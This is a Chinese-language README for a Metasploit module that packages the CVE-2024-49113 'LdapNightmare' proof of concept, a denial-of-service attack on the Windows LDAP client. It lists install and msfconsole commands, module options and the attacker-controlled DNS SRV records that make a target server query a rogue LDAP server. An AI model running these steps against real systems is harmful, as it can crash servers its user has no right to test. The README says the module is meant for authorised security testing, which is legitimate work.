SafeBreaches CVE-2024-49113 POC(LdapNightmare)集成到 Metasploit
本模块实现了 CVE-2024-49113,这是一个 Windows LDAP 客户端中的严重漏洞,可能导致系统不稳定。该模块与 Metasploit 框架集成,为测试系统对该漏洞的抵御能力提供了一种可靠的方法。
ldaptor
impacket
安装所需的 Python 包:
pip install -r requirements.txt
将模块放置到 Metasploit 模块目录中:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
确保模块可执行:
chmod +x ldapnightmare.py
启动 msfconsole:
msfconsole
加载并配置模块:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - 目标地址(必填)RPORT - RPC 的目标端口(默认:49664)LPORT - LDAP 服务器的本地端口(默认:389)DOMAINNAME - 攻击者的域名(必填)。该域名必须配置特定的 DNS SRV 记录(参见下面的域名配置)ACCOUNT - 目标账户名(默认:Administrator)SITENAME - 目标站点名称(默认:空)DOMAINNAME 参数需要配置特定的 DNS SRV 记录。该域名下必须具有两条 SRV 记录:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostname重要说明:攻击者的机器主机名只有在受害服务器能通过 NBNS 解析时才有效。或者,您可以将主机名替换为指向您 LDAP 服务器 IP 地址的域名。
该模块分三个主要阶段运行:
本模块仅供授权的安全测试和研究目的使用。用户必须在测试不属于自己或未获得测试许可的系统之前获得适当的授权。
本模块根据 BSD 3-Clause 许可证发布。
本作品包含源自以下项目的代码:
完整的许可证文本可在 LICENSES 文件中找到。